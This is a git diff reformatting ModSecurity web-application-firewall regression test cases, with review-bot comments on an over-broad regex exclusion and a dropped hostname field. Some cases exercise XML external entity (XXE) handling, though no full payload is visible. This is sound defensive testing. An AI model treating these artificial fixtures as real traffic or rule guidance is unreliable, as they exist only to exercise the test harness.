"port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." 
+ ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:ref", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:ref", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] } ] diff --git a/test/test-cases/regression/config-xml_external_entity.json b/test/test-cases/regression/config-xml_external_entity.json index 1f5cf098dc..0059b41b00 100644 
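Review bot: Case "(5/6)" excludes with `!ARGS:'/(?!ref)/'`, which is not anchored although its title says it is. Assuming the name regex is applied as a search (case 4/6 excludes `key` with `/ke/`), a bare negative lookahead matches somewhere in every argument name, so the expected 200 would also be produced by an exclusion that silently removes all of ARGS from the rule. A companion case in which a non-excluded argument still reaches the `deny` and expects 403 would catch an over-broad exclusion; config-update-target-by-id.json already has such a match / no-match pair for ARGS_NAMES. The titles also count up to "(7/6)", and 5/6 and 6/6 share one description despite testing different patterns.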
--- a/test/test-cases/regression/config-xml_external_entity.json
+++ b/test/test-cases/regression/config-xml_external_entity.json
@@ -1,26 +1,27 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 1", - "expected":{ - "debug_log": "Target value: \" jo smith\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 1", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: \" jo smith\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 2", - "expected":{ - "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", - "http_code": 403 + 
"enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 2", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 3", - 
"expected":{ - "debug_log": "XML Error: No declaration for element bookstore", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 3", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "XML Error: No declaration for element bookstore", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] } ] - 
diff --git a/test/test-cases/regression/debug_log.json b/test/test-cases/regression/debug_log.json index 9e17fac69e..a0d4e119f6 100644 --- a/test/test-cases/regression/debug_log.json +++ b/test/test-cases/regression/debug_log.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -26,31 +26,32 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶2=test2", + "uri": "/test.pl?param1=test¶2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": ".*", - "error_log": "" + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -58,7 +59,6 @@ "SecRule ARGS \"@contains /test.txt\" \"id:4,allow\"", "SecRule ARGS:teste \"@contains /test.txt\" \" id:1,allow,deny\"", "SecRule ARGS \"@contains /test.txt\" \"allow, allow,id:2,deny\"" - ] } ] diff --git a/test/test-cases/regression/directive-sec_rule_script.json b/test/test-cases/regression/directive-sec_rule_script.json index b8eb904759..d17e00743e 100644 
--- a/test/test-cases/regression/directive-sec_rule_script.json
+++ b/test/test-cases/regression/directive-sec_rule_script.json
@@ -1,201 +1,210 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (1/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script 'test-cases/data/match" - }, - "rules":[ + "uri": 
"/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script 'test-cases/data/match" + }, + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-ops.lua \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (2/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + 
"Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script " - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script " + }, + "rules": [ "SecRuleEngine On", "SecRuleScript /bin/echo \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (3/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; 
en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" + }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"echo 123", - "error_log":"", - "parser_error":"", + "body": [ + "" + ] + }, + "expected": { + "debug_log": "echo 123", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-log.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + 
"enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (4/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"Running \\(disruptive\\) action: deny", - "error_log":"", - "parser_error":"", + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Running \\(disruptive\\) action: deny", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] } ] - diff --git a/test/test-cases/regression/fn-setHostname.json b/test/test-cases/regression/fn-setHostname.json index 59c5b52e8f..461bfcde32 100644 --- a/test/test-cases/regression/fn-setHostname.json +++ b/test/test-cases/regression/fn-setHostname.json 
@@ -1,38 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing function :: setRequestHostName", + "enabled": 1, + "version_min": 300000, + "title": "Testing function :: setRequestHostName", "client": { - "ip":"200.249.12.31" + "ip": "200.249.12.31", + "port": 0 }, - "server":{ - "ip":"200.249.12.31", - "port":80, - "hostname":"modsecurity.org" + "server": { + "ip": "200.249.12.31", + "port": 80 }, "request": { "headers": { - "Host":"www.modsecurity.org" + "Host": "www.modsecurity.org" }, - "uri":"/foo?q=attack", - "http_version": 1.1 + "uri": "/foo?q=attack", + "method": "", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/plain" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/plain" }, - "body":[ + "body": [ "denystring" ] }, - "expected":{ - "http_code": 403, - "debug_log": "[hostname: \"modsecurity.org\"]" + "expected": { + "debug_log": "[hostname: \"modsecurity.org\"]", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule ARGS_GET \"@contains attack\" \"id:1,phase:2,deny\"" diff --git a/test/test-cases/regression/issue-1152.json b/test/test-cases/regression/issue-1152.json index 54c78f7991..d6e0dd941f 100644 --- a/test/test-cases/regression/issue-1152.json +++ b/test/test-cases/regression/issue-1152.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
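Review bot: In fn-setHostname.json the rewritten `server` object drops `"hostname": "modsecurity.org"`, but `expected.debug_log` still requires `[hostname: \"modsecurity.org\"]` and the request's `Host` header is `www.modsecurity.org`. If the regression harness uses `server.hostname` to set the request host name (the harness code is not visible here, so this needs confirming), the case will either fail or stop covering the function its title names. Unless the removal is deliberate, I would keep the field by writing `"port": 80,` followed by `"hostname": "modsecurity.org"`. The added `"port": 0` and `"method": ""` also look like placeholder defaults and are worth a line in the commit message, since the JSON cannot carry a comment. The test object's closing lines fall outside this hunk.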
@@ -16,8 +16,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 @@ -52,7 +57,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,8 +69,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -75,17 +80,20 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { @@ -102,7 +110,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,8 +122,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -125,17 +133,20 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { 
